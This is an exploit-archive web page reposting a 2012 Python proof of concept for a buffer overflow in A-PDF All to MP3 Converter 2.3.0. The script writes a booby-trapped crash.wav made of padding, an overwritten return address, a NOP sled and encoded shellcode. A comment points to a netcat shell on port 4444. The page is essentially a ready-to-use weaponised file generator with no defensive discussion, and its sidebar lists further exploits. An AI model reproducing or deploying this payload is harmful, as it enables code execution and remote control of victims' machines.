首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
A-PDF All to MP3 Converter v.2.3.0 buffer overflow
来源:vfocus.net 作者:metacom 发布时间:2012-11-13  
#!/usr/bin/python

# Exploit Title: A-PDF All to MP3 Converter v.2.3.0 buffer overflow
# Software Link: http://www.a-pdf.com/all-to-mp3/download.htm
# Version: <= 2.3.0
# Tested on: Win7 German
# Date: 12/11/2012
# Author: metacom
#details:  Open the app, drag the wav file,
#nc ip 4444

filename = "crash.wav"

junk = "\x41" * 4128
buff = "\x98\x6E\x43\x00"          #00436E98
nops = "\x90" * 50
shell = ("\xba\x91\x02\x94\xec\xda\xc8\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
"\x56\x83\xee\xfc\x31\x56\x0f\x03\x56\x9e\xe0\x61\x10\x48\x6d"
"\x89\xe9\x88\x0e\x03\x0c\xb9\x1c\x77\x44\xeb\x90\xf3\x08\x07"
"\x5a\x51\xb9\x9c\x2e\x7e\xce\x15\x84\x58\xe1\xa6\x28\x65\xad"
"\x64\x2a\x19\xac\xb8\x8c\x20\x7f\xcd\xcd\x65\x62\x3d\x9f\x3e"
"\xe8\xef\x30\x4a\xac\x33\x30\x9c\xba\x0b\x4a\x99\x7d\xff\xe0"
"\xa0\xad\xaf\x7f\xea\x55\xc4\xd8\xcb\x64\x09\x3b\x37\x2e\x26"
"\x88\xc3\xb1\xee\xc0\x2c\x80\xce\x8f\x12\x2c\xc3\xce\x53\x8b"
"\x3b\xa5\xaf\xef\xc6\xbe\x6b\x8d\x1c\x4a\x6e\x35\xd7\xec\x4a"
"\xc7\x34\x6a\x18\xcb\xf1\xf8\x46\xc8\x04\x2c\xfd\xf4\x8d\xd3"
"\xd2\x7c\xd5\xf7\xf6\x25\x8e\x96\xaf\x83\x61\xa6\xb0\x6c\xde"
"\x02\xba\x9f\x0b\x34\xe1\xf7\xf8\x0b\x1a\x08\x96\x1c\x69\x3a"
"\x39\xb7\xe5\x76\xb2\x11\xf1\x79\xe9\xe6\x6d\x84\x11\x17\xa7"
"\x43\x45\x47\xdf\x62\xe5\x0c\x1f\x8a\x30\x82\x4f\x24\xea\x63"
"\x20\x84\x5a\x0c\x2a\x0b\x85\x2c\x55\xc1\xb0\x6a\x9b\x31\x91"
"\x1c\xde\xc5\x04\x81\x57\x23\x4c\x29\x3e\xfb\xf8\x8b\x65\x34"
"\x9f\xf4\x4f\x68\x08\x63\xc7\x66\x8e\x8c\xd8\xac\xbd\x21\x70"
"\x27\x35\x2a\x45\x56\x4a\x67\xed\x11\x73\xe0\x67\x4c\x36\x90"
"\x78\x45\xa0\x31\xea\x02\x30\x3f\x17\x9d\x67\x68\xe9\xd4\xed"
"\x84\x50\x4f\x13\x55\x04\xa8\x97\x82\xf5\x37\x16\x46\x41\x1c"
"\x08\x9e\x4a\x18\x7c\x4e\x1d\xf6\x2a\x28\xf7\xb8\x84\xe2\xa4"
"\x12\x40\x72\x87\xa4\x16\x7b\xc2\x52\xf6\xca\xbb\x22\x09\xe2"
"\x2b\xa3\x72\x1e\xcc\x4c\xa9\x9a\xfc\x06\xf3\x8b\x94\xce\x66"
"\x8e\xf8\xf0\x5d\xcd\x04\x73\x57\xae\xf2\x6b\x12\xab\xbf\x2b"
"\xcf\xc1\xd0\xd9\xef\x76\xd0\xcb")



exploit = junk+buff+nops+shell

textfile = open(filename,"w")
textfile.write(exploit)
textfile.close()
print " [+] crash.wav File created successfully. :)"

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Visio 2010 memory co
·Apache downloader patch auto E
·Microsoft Publisher 2013 memor
·Zoner Photo Studio v15 Build 3
·Microsoft Office Excel 2013 me
·Smadav Anti Virus 9.1 Crash Po
·Zoner Photo Studio 15 Buffer O
·Java Applet JAX-WS Remote Code
·Microsoft Office Excel 2007 Wr
·Invision Power Board 3.3.4 Uns
·Invision IP.Board 3.3.4 unseri
·LibreOffice Suite 3.5.5.3 Deni
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved